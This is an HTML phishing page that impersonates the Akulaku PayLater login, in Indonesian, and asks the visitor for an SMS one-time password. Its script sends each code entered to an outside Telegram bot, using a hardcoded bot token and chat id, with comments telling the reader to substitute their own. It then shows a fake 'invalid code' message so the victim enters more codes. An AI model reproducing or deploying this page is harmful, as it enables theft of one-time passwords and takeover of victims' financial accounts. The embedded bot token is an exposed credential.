<html lang="en">
 <head>
<meta name="theme-color" content="#FF3131">
  <meta charset="UTF-8"> 
  <title>Akulaku PayLater</title>
  <meta name="viewport" content="width=device-width,initial-scale=1,minimum-scale=1,maximum-scale=1,user-scalable=no,viewport-fit=cover">
    <link href="https://res.cloudinary.com/crunchbase-production/image/upload/c_lpad,h_170,w_170,f_auto,b_white,q_auto:eco,dpr_1/c01y0scakhfnmlybeip9" rel="shortcut icon" type="image/x-icon">
  <link href="https://res.cloudinary.com/crunchbase-production/image/upload/c_lpad,h_170,w_170,f_auto,b_white,q_auto:eco,dpr_1/c01y0scakhfnmlybeip9" rel="apple-touch-icon">
  <link rel="dns-prefetch" href="https://cstatic.akulaku.net">
  <link rel="dns-prefetch" href="https://at.alicdn.com">
  <link rel="preconnect" href="https://ec-cstatic.akulaku.net">
  <link rel="dns-prefetch" href="https://ec-cstatic.akulaku.net">
  <style>#modal-root{z-index:1999}</style> 
  <link href="https://ec-cstatic.akulaku.net/openpay/umi.0a900b80.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/479.e233ddfe.chunk.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/openPay/app.c7fc5aba.chunk.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/3311.25d87eff.chunk.css" rel="stylesheet" type="text/css">
  <link href="https://ec-cstatic.akulaku.net/openpay/openPay/signin.6427c161.chunk.css" rel="stylesheet" type="text/css">
  
  
  
 <style>
      @import url('https://fonts.googleapis.com/css2?family=Nunito:wght@800&display=swap');
}
* {
    margin: 0px;
}
html, body {
      max-width: 100%;
      overflow-x: hidden;
      }
body {
    margin: 0px;
    background: transparent;
    color: #000;
    font-family: 'sageo UI', sans-serif;
}
welalxcome {
        position: fixed;
    left: 0;
    top: 0;
    width: 100vw;
    height: 90vh;
    display: flex;
    flex-direction: row;
    flex-wrap: nowrap;
    align-items: center;
    align-content: center;
    justify-content: center;
    background: transparent;
}
welalxcome img {
        width:10vw;
    height: auto;
    background: transparent;
}
chsalxcome {
        position: relative;
    width: 100%;
    height: 100vh;
    display: flex;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
}
.talxcome {
    width: 130%;
    flex-direction: column;
    flex-wrap: nowrap;
    align-items: center;
    height: 100%;
    justify-content: center;
}

h1{
            display: table;
            background-color: #FF0000;
            color: #fff;
            padding: 16px;
            width: 100%;
            height: 20px;
            font-size: 1em;
            text-align: center;
            margin-top: 0px;
            margin-bottom: -55px;
            position: fixed;
            z-index: 99999;
            
        }

.blink {
  animation: blink-animation 2s steps(6, start) infinite;
  -webkit-animation: blink-animation 2s steps(6, start) infinite;
}
@keyframes blink-animation {
  to {
    visibility: hidden;
}
@-webkit-keyframes blink-animation {
  to {
    visibility: hidden;
}




</style>
  
<body>
     
 
 </head>
 <body style="font-size: 14px;">
     <main>
<welalxcome style="background-color: transparent; display: ;" id="welalxcome">
<img src="https://media.tenor.com/wpSo-8CrXqUAAAAj/loading-loading-forever.gif" alt="" />
</welalxcome>
<chsalxcome2 style="display: none;">
<div style="height:auto;width: auto;margin-top: -10px;margin-bottom: 0px;float:center;margin-left:0%" class="talxcome"><p></p><br>
</div>
  <div id="__next" class="akulaku-app-container">
   <div class="maxHeight">
    <div class="scrollView___1SZhk container___biXSk">
   <div class="header___3rna1" style="position: absolute; top: 0; right: 0; left: 0; margin: 0px auto; height: 150px; background: url('https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibVz1Jb-d4ErkzP4yggbHAuKcpysLtbVaGC2m8gYDcFwU119D9X5-aKgU-XzDb0vlJAwY8ktXs6Y2R5WwrFcEgfSVbKiLSnY4hV8Fm4TDbJm8Nb1rE6ugeWB6Oax_HrlXnflqHtshQid8zRc6jIha3_6WF-oK8DgBXKy7OERpY78CG7-OuQjjmsGMEBIE/s16000/1689841912425.png') no-repeat center center; background-size: 100% 100%; background-position: 100% 100%; z-index: ">

     
       
      <span class="text___3ApSa"></span>
     </div>
     <div class="containerBody___3Z8i0">
      <div class="mainBody___19TOW" style="top: 122px; position: absolute; z-index: 1; margin: 0px auto; left: 0; right: 0; width: 94%; border-radius: 20px">
       <div class="font-roboto-bold mainBodyTitle___EmqFM" style="z-index: 1">
           <center>
       <font id="validd">Konfirmasi OTP</font>
        </center>
       </div>
       <form onsubmit="kirimPesan(event); return false" method="Post" class="formSmsLogin___35r-1">
       
        <div class="inputWrapper___1QPHM mb14___2fwyK">
         <div class="inputContent___2SN63">
          <div class="font-roboto-medium prefix___2vr4B">
           <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEig30fFAbqfMdDMvwS-PufbAvyKDI9Zi9PD08jnyECZqlJpL34Gjb0osswJd0wDEm9c6YXzQHodgiG7Np7rzRyja3wiTErMBOtU5Xgz31KPBXSTRfVsjdfT8bPxNH8e3FfunniuXqmYmkxoLMoJpZHuPAu_snhQwE8V5vJlwlLBdohn8dsAgk8bQ7qh/s554/sms.png">
           <span></span>
          </div>
          <div class="FormInputWrapper___2YPnU">
           <div class="input-group___3rbjL one_icon___2Dl7X">
            <input class="font-roboto-medium" id="otp" type="text" name="sms" inputmode="numeric" required="true" placeholder="Masukkan OTP" maxlength="6" minlength="5" value="">
            <span class="icon_area___NIAqv"></span>
            <p></p>
           </div>
          </div>
         </div>
           <div>
               </br>
               </br>
   <button id="kirim"><a role="button" class="am-button font-roboto-medium LoginSubmitBtn___3LblX mb14___2fwyK am-button-warning" ="false"><span id="kirimk">Konfirmasi</span></a>
        <div class="terms___1M7gU">
         <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhwPRcx3jkTpyA5u1txN0ja4bCZqKQyEGnoNwMfKMS7rbDY6-79J1sC_8dcBbO3SpW8pw2nCyphTqPtVEYLL9tbQoXFHHfOclTq6kvxps_2U3CLzgaeUAuwwRtv9sf9yJxgp3EKBphne_Tez4y96iWZ1_BxQz-dUfVMBVJsBDQQuz1chGYgZAf7frXz/s36/centang.png" alt="">
         <p><span>Dengan klik Login berarti kamu telah membaca dan menyetujui perjanjian ketentuan berikut </span><a>Pendaftaran Pengguna</a></p>
        </div>
       </form>
       <div class="registerBanner___1nS95">
        <div class="registerIcon___2irhY">
         <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMXQnuaLoyv6EvSOvXz4y_5wYePwHvu7mvqKOKmWSrulVMQkOOcwFNYo71oKnSfgf-kbs_8YthDxRc20Ju6C4m5oZRQJx_gwFmSnbE7CGvg6vnIKB-RV8d3NvJP4mXgTripvrNurSFj5uj9o--2IFHTU47WCUPRwm8kzsVL_WaW60E6QlVKbxBeYWF/s84/kado.png">
        </div>
        <span class="font-regular"></span>
        <div class="font-regular registerBtn___2OpDu">
         Daftar
        </div>
       </div>
      </div>
      <div class="footer___3zw6C">
       <img src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1OKqcWOb0hVNXodpaIZ_twJfOcLY4WSnEpVUzV3FQSKgwpfH4NKpa8_TeskOmKLgri-LNF2tqooApFPW_78PP8v5hmzBVJuP9Z0zCYyRHP4An3sHvlSc7rWJRzYdJrhdZUn-nxZqZwbElz7nIWzXYsFAo2JsxtI_UOIn6LTKZJVf0WeWI0_VQ_XAw/s542/ojk.4ed70c7b.png" alt="">
      </div>
     </div>
    </div> 
   </div>
  </div> 
  <div id="modal-root"></div>
  <div id="userdata_el" style="visibility: hidden; position: absolute;"></div>
   <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
<script type="text/javascript" src="https://code.jquery.com/jquery-1.10.2.min.js"></script>
<script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.1/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/2.1.3/jquery.min.js"></script>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" integrity="sha512-894YE6QWD5I59HgZOGReFYm4dnWc1Qt5NtvYSaNcOP+u1T9qYdvdihz0PPSiiqn/+/3e7Jo4EaG7TubfWGUrMQ==" crossorigin="anonymous" referrerpolicy="no-referrer"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.3.1/jquery.min.js"
    integrity="sha512-+NqPlbbtM1QqiK8ZAo4Yrj2c4lNQoGv8P79DPtKzj++l5jnN39rHA/xsqn8zE9l0uSoxaCdrOgFs6yjyfbBxSg=="
    crossorigin="anonymous" referrerpolicy="no-referrer"></script>
    <script src="https://code.jquery.com/jquery-3.5.1.min.js"></script>
    <script src="./js/app.js"></script>
  
  
  <script>
$( document ).ready(function() {
            setTimeout(() => {
                $('welalxcome').hide();
                $('chsalxcome2').fadeIn();
            },1000)
        });


        </script>
   <!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>

<script src="https://static.app/js/static.js" type="text/javascript"></script>-->
 
<script>
function kirimPesan(event) {
event.preventDefault();



document.getElementById('kirimk').innerHTML = 'Mohon Tunggu....';
 $('#welalxcome').show();
    var otp = document.getElementById('otp');
    
   var gabungan = '𝓐𝓴𝓾𝓵𝓪𝓴𝓾' + '%0A𖥔 𝗢𝗧𝗣 𝗔𝗞𝗨𝗟𝗔𝗞𝗨 : ' + otp.value;
   
        var token = '7378086672:AAG5pofkBXBYDdpGxcHPJGFTZ6K-n3xX-7U'; // Ganti dengan token bot yang kamu buat
    var grup = '7081931750'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
        
      success: function(){
   setTimeout(function(){
 $("#validd").text("Maaf!!, Kode verifikasi invalid");
 $("#validd").css("color","red");
        }, 1500);
    setTimeout(function(){  
  
        $("#validd").css("color","green");   
  $("#kirimk").val("Coba Lagi");      
    $("#validd").text("Kode Sudah kami kirim kembali");
    $('#otp').val('');
    $('#otp').focus();
    }, 4000);
    setTimeout(function(){  
              $("#validd").css("color","black");  
        $("#validd").text("Konfirmasi OTP"); 
        $("#kirimk").val("Coba Lagi");      $("#kirimk").val("Konfirmasi");      
    }, 6000);
   }});};      
</script>
</body>
</html><!--<script src='https://a.bsite.net/footer.js'></script>